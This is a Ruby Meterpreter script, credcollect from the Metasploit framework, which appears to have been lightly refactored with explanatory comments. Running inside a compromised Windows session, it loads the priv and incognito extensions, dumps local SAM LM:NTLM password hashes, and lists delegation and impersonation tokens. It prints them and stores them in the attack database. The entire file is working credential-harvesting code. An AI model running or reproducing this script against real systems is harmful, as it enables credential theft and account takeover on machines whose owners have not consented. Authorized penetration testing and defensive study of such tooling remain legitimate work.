
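##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# credcollect - tebo[at]attackresearch.com
#
# Reads the local SAM hashes through the "priv" extension and the list of
# delegation/impersonation tokens through the "incognito" extension of a
# Windows Meterpreter session, prints them to the console and, when the
# framework database is active, records them via report_auth_info /
# report_note.
#
# Names supplied by the script runner: +client+ (the session) and +args+
# (the command-line tokens). Every path ends by raising
# Rex::Script::Completed.

opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-p" => [ true, "The SMB port used to associate credentials." ]
)

# Port written into each hash record so it is tied to the SMB service.
smb_port = 445

opts.parse(args) do |opt, _idx, val|
  case opt
  when "-h"
    print_line("CredCollect -- harvest credentials found on the host and store them in the database")
    print_line("USAGE: run credcollect")
    print_line(opts.usage)
    raise Rex::Script::Completed
  when "-p" # This ought to read from the exploit's datastore.
    # NOTE: String#to_i silently yields 0 for non-numeric input; kept as-is
    # so existing invocations behave the same.
    smb_port = val.to_i
  end
end

# Guard clause replaces the original if/else: anything but Windows exits here.
unless client.platform == 'windows'
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end

# Collect even without a database to store them; db_ok only gates the writes.
db_ok = client.framework.db.active

# Make sure we're rockin Priv and Incognito
client.core.use("priv") unless client.respond_to?("priv")
client.core.use("incognito") unless client.respond_to?("incognito")

# It wasn't me mom! Stinko did it!
hashes = client.priv.sam_hashes

# Target infos for the db record
addr = client.sock.peerhost
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)

# Record hashes to the running db instance. Note that each LM:NTLM pair is
# also echoed in clear to the console, so the session log carries the same
# material as the database.
print_good "Collecting hashes..."
hashes.each do |hash|
  data = {
    :host   => addr,
    :port   => smb_port,
    :sname  => 'smb',
    :user   => hash.user_name,
    # Interpolation instead of String#+ so a nil half does not raise.
    :pass   => "#{hash.lanman}:#{hash.ntlm}",
    :type   => "smb_hash",
    :active => true
  }
  print_line " Extracted: #{data[:user]}:#{data[:pass]}"
  client.framework.db.report_auth_info(data) if db_ok
end

# Record user tokens
tokens = client.incognito.incognito_list_tokens(0)
raise Rex::Script::Completed unless tokens

# Meh, tokens come to us as a formatted string, one token per line under the
# "delegation" and "impersonation" keys. The two strings are split separately
# (the original concatenated them first, which would fuse the last delegation
# line with the first impersonation line if the former lacked a trailing
# newline), a missing key is treated as empty instead of raising, and blank
# lines are not reported as notes.
print_good "Collecting tokens..."
token_blobs = [tokens["delegation"], tokens["impersonation"]].compact
token_lines = token_blobs.flat_map { |blob| blob.split("\n") }.reject(&:empty?)
token_lines.each do |token|
  data = {
    :host   => addr,
    :type   => 'smb_token',
    :data   => token,
    :update => :unique_data
  }
  print_line " #{data[:data]}"
  client.framework.db.report_note(data) if db_ok
end

raise Rex::Script::Completed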